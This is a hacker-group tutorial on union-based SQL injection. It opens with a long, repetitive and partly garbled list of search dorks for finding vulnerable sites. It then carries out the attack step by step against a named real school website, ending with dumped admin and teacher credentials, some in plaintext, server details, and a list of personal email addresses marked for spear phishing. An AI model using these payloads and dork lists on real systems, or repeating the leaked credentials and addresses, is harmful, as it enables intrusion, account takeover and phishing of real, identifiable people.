Tutorial SQL Injection Union Based

0x1#~ Introduction

# What is SQL Injection?
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database

[?] Info:
- It's a flaw in the web application,not the database, or the server.
- Can be injected into: Cookies, Forms, and URL parameters. 

(What are Cookies ? http://en.wikipedia.org/wiki/HTTP_cookie)

# Why UNION?
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables. 

0x2#~ Attack

# Here is a list of d0rks to find SQL vulnerabilities:
A lot of these sites are already being hacked by other hackers but it's useful for training !

Code:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

#------------------------------------------------------------------------------------+
| I have found a vulnerable website, i am not responsible of your damage.
| I prefer make a tutorial on a real site to be in a real situation 
#------------------------------------------------------------------------------------+

#[1] Find the vulnerable parameter

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error)
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)

"Why error ? i don't see any error message  ???"
It's normal, in this case the error is the blank page:

#[2] Find the number of columns
To get to the point, what we're about to do is find how many columns the website has using No Error/Error statements.

Start by entering order by 100-- 

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)

The page displays correctly, so there are 9 columns:

#[3] Time to execute the UNION SELECT statement
We have to select the 9 columns:

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--

Wow, the number 4 appears, the 4th column is vulnerable to SQL injection and we'll extract the database from here:

#[4] Informations

Now we know where to inject, you can reap some information about the database using: concat(the query())

Examples:
- version()

Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--

- @@datadir

Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--

- @@hostname
Hmm I don't know why it doesn't work on this site 

- database()

Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--

- user()

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--

-show all

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),5,6,7,8,9--

0x3c62723e = 0x<br> converted in Hex = 0x3c62723e

First let's look up some functions we're gonna use to extract table names (Important)

Quote:group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order

#[5] Show all tables of the database 
I apply the functions I mentioned

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--

You should see this:

Code:

allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc

Wow, there are two interesting columns: login and login_admin ! Humm "admin" I love this kind of column 

#[6] Extract data from columns

'login' seems to be having users information stored in it.
'login_admin' seems to be having admins information stored in it.

To do this, we're gonna have to alter some queries a bit. Look closely at this syntax:

Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

We need to replace:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x6c6f67696e5f61646d696e--" (login_admin)

To make a Hex readable, we put "0x" at the beginning. To enter that table using the syntax above, we have to convert that table name to Hex. If you are using the Firefox HackBar like me, you can do that:



And the result will be: 0x44616973756b65a



Or: http://www.string-functions.com/hex-string.aspx

So! After have launched the injection in the column login_admin, we have 4 columns: admin_id, usernme, passwrd, logtime

Let's look up some functions we replaced and know their uses.

Quote:group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex

Results:

Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--

It show admin credentials:

admin_id	passwrd	logtime	usernme
1	3¢PÉÜœz;þß„mJ…	2014-02-11 01:25:09	admin

You can try with the column that you want. I use the same injection for the column login

Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--

Then

Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--

The final dump 

Code:

____        _           _       
|  _ \  __ _(_)___ _   _| | _____
| | | |/ _` | / __| | | | |/ / _ \
| |_| | (_| | \__ \ |_| |   <  __/
|____/ \__,_|_|___/\__,_|_|\_\___|
            /\  The Hackers Bay | The Hackers Boat
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /====================================="
            \/
           
           
http://dbhspgoa.edu.in
goaed_ucation
5.0.37-standard
/var/lib/mysql/
goaed_ucationu@72.35.83.36

===============table admin================
admin_id, usernme, passwrd, logtime
1 3¢PÉÜœz;þß„mJ… 2014-02-11 01:25:09 admin

===============table login================
a_id ,aname ,apass ,logtime ,fullname ,atype ,t_status ,a_schid ,school_news ,school_attendance ,school_magazine ,school_marksht ,school_stud ,school_allum ,school_content ,school_daythought ,school_event ,school_nav ,school_ban ,school_photo ,school_art ,school_courses ,school_teacher ,school_grace ,school_report ,school_admission ,school_testimonial ,school_excelsheet

1 admin admin
,2 sanjeevh sanjeev
,3 teacher1cc teacher1cc
,4 teacher12gg teacher12gg
,5 teacher122 teacher122
,6 teacher100 teacher100
,7 teacher155 teacher155
,8 teacher177 teacher177
,9 teacher277 teacher277
,11 fragnel f2009
,12 test M»`¹¾l‚L:­d)µ¦Á
,13 donbosco De©«vý¹`MáúK
,14 pccc2010 †ÉZ¶ºšb˜C$‹4-|
,15 Roy W$÷
_5g:¹ò@ÝÞ
,16 Principal ¿¦o¹ƒ4º~ÂëÞʲP
,17 francis ›Ùó ¹ÈìÕ'ꊡ¸†#
,18 xavmartin ›Ùó ¹ÈìÕ'ꊡ¸†#
,20 ishaniroy •¹òÄ xR¾–îƒSû³X
,22 namdevg >y Œö÷Úèá’#qž
,23 oscarn Ò² «5ÅÆl5B«ƒ3õc
,24 soniyas ´oÀ7#ÆWâ²Ë“ðû
,25 hclerk t/#`eó
´©ýŠ†ê
,29 satishsanvol .óÜ:¿#ÿ²£Á3cw
,30 stmichael_e4r Ün‘šÆ‡H3«CÙS„-
,31 test ص¦†õ%„p8B×€bYàÛ
,32 test1 Ïf¥ÓeÜ9ê„š¨¬ó
,33 zantye ¢ ååçêaGÿF0c]Ì

================Misc================
Apache 1.3.41
FrontPage/5.0.2.2510
Apache module mod_perl/1.29 FrontPage/5.0.2.2510
Mod SSL 2.8.31
Open SSL 0.9.8b
PHP 4.4.8

Emails on dbhspgoa.edu.in (Spear phishing)
shaunakdsilva@yahoo.com
bhatimax@gmail.com
raunaq.ep@gmail.com
ikasrikant@hotmail.com
francisloves01@yahoo.com
rishiwrite@gmail.com
reuben.rebelo@rediff.com
mobypirate@hotmail.com
avesh.mahagaokar@hotmail.com
mak.man@live.com
clint.rb@rediffmail.com
principal@dbhspgoa.edu.in
jnmoses2000@yahoo.com
maheshverma124@gmail.com
reube.rebelo@rediff.com
yamuna.bepari@gmail.com
ethanferns4@gmail.com
greynomenezes@gmail.com
anthonydcosta95@gmail.com
edesa@yahoomail.com
dboscopanjim@yahoo.co.in

____________________________________________________________

0x3#~ Links
- http://hakipedia.com/index.php/SQL_Injection
- http://hex.online-toolz.com/tools/text-h...vertor.php
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet

0x4#~ Credits & Authors
Daisuke Dan - TheHackersBay
Penetration testing, Research Team

Categories: SQL Injection